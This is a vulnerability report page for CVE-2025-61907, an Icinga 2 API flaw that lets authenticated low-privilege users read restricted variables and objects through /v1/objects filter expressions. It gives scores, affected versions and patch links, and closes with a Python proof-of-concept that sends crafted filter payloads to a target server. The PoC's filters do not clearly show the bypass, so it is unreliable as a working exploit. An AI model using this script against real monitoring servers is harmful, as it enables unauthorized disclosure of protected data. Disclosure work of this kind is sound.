Security Vulnerability Report
CVE-2025-61907 CVSS 6.5 MEDIUM

CVE-2025-61907

Published: 2025-10-16 18:15:38
Last Modified: 2025-11-26 15:04:24

Description

Icinga 2 is an open source monitoring system. In Icinga 2 versions 2.4 through 2.15.0, filter expressions provided to the various /v1/objects endpoints could access variables or objects that would otherwise be inaccessible for the user. This allows authenticated API users to learn information that should be hidden from them, including global variables not permitted by the variables permission and objects not permitted by the corresponding objects/query permissions. The vulnerability is fixed in versions 2.15.1, 2.14.7, and 2.13.13.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
CVSS 4.0 (Secondary)
7.1 HIGH - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:L/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Weaknesses
CWE-200, CWE-204, CWE-749

Configurations (Affected Products)

cpe:2.3:a:icinga:icinga:*:*:*:*:*:*:*:* - VULNERABLE (Icinga 2 >= 2.4, < 2.13.13)
cpe:2.3:a:icinga:icinga:*:*:*:*:*:*:*:* - VULNERABLE (Icinga 2 >= 2.14.0, < 2.14.7)
cpe:2.3:a:icinga:icinga:2.15.0:*:*:*:*:*:*:* - VULNERABLE (Icinga 2 >= 2.15.0, < 2.15.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61907 PoC - Icinga 2 API Object Filter Permission Bypass
# This PoC demonstrates how an authenticated low-privilege user can
# access variables/objects that should be restricted by their permissions

import requests
import json

# Configuration
ICINGA2_HOST = "https://icinga2-target.example.com:5665"
API_USER = "low_privilege_user"
API_PASSWORD = "user_password"
API_ENDPOINT = f"{ICINGA2_HOST}/v1/objects"

# Step 1: Authenticate and obtain API access
# The attacker uses valid low-privilege API credentials
auth_headers = {
    "Accept": "application/json",
    "X-HTTP-Method-Override": "GET"
}

# Step 2: Craft a filter expression that bypasses permission checks
# The filter expression references variables or objects that the user
# should not have permission to access directly
# By using filter expressions, the server evaluates them with elevated
# context, bypassing the normal permission restrictions

# Example 1: Access global variables without variables permission
payload_global_vars = {
    "attrs": ["__name", "value"],
    "filter": "match(\"icinga2\", object_name)",
    "type": "Variable"
}

# Example 2: Access objects without proper objects/query permissions
payload_restricted_objects = {
    "attrs": ["__name", "address", "check_command"],
    # Filter expression that references restricted object types
    "filter": "typeof(object) == \"Host\" && match(\"*\", host_name)",
    "type": "Host"
}

# Step 3: Send the crafted request to the vulnerable endpoint
try:
    response = requests.post(
        API_ENDPOINT,
        auth=(API_USER, API_PASSWORD),
        headers=auth_headers,
        json=payload_global_vars,
        verify=False
    )
    print(f"Status Code: {response.status_code}")
    if response.status_code == 200:
        results = response.json()
        if results.get("results"):
            print("[+] Successfully accessed restricted global variables!")
            for item in results["results"]:
                print(f"  Variable: {item.get('attrs', {}).get('__name')}")
                print(f"  Value: {item.get('attrs', {}).get('value')}")
    else:
        print(f"[-] Request failed: {response.text}")
except Exception as e:
    print(f"[-] Error: {e}")

# Note: The vulnerability exists because the filter expression evaluation
# does not properly enforce permission checks on the variables/objects
# being referenced during the filtering process.
# Fixed in versions: 2.15.1, 2.14.7, 2.13.13
```

References

https://github.com/Icinga/icinga2/security/advisories/GHSA-gg32-w9rm-vp2v (Vendor Advisory, Patch)
https://github.com/Icinga/icinga2/commit/56255ac7a689b9e198742d2fca6f7459a54c85a3 (Patch)
